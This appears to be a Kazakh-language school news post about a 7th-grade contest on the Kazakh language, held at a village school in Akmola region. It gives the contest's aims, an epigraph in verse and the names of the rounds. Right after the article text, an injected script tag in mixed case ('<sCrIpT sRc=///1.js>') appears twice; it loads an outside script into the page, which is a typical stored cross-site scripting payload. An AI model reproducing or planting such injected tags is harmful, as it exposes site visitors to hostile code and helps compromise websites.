2024 жылғы 14 ақпан күні "Ақмола облысы Білім басқармасының Астрахан ауданы бойынша білім бөлімінің Жалтыр ауылының № 3 жалпы орта білім беретін мектебі " коммуналдық мемлекеттік мекемесінің қазақ тілі мен әдебиеті пәнінің мұғалімі Кыстаубаева Гульжан Нурсагитовна 7 сынып оқушыларды екі топқа бөліп, «Тіл- ұлттың жаны» тақырыбында зияткерлік сайысты өткізді. Сайыстың мақсаты: оқушыларды іздеуге дағдыландыру, сөздік қорын молайту, көпшілік алдында өз пікірін жеткізе білуге ынталандыру, ойын барысында оқушылардың ауызша ой-өрісін дамыту, мемлекеттік тілді қадірлеуге мақтан етуге тәрбиелеу. Шараның эпиграфы: Көп тіл білсең көкжиегің кең болар, Құрметтейді кісі екен деп төрге озар. Қай елде жүрсең де бұл дұрысы- Мемлекеттік тілді үйренген жөн болар. Сайыстың барысы: «Жедел жауап»,«Сөз мәйелі- мақал»,«Жұмбақтар әлемі»,«Көп сөздер»,«Қызықты ұйқастар». Әр оқушы сайыстың әр кезеңіне белсенді қатысты. Сайыстың алдында қойылған мақсаттар орындалды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.02.2024
Просмотров: 7544


Пікір қосу



Деректерді қолтаңбаға қосу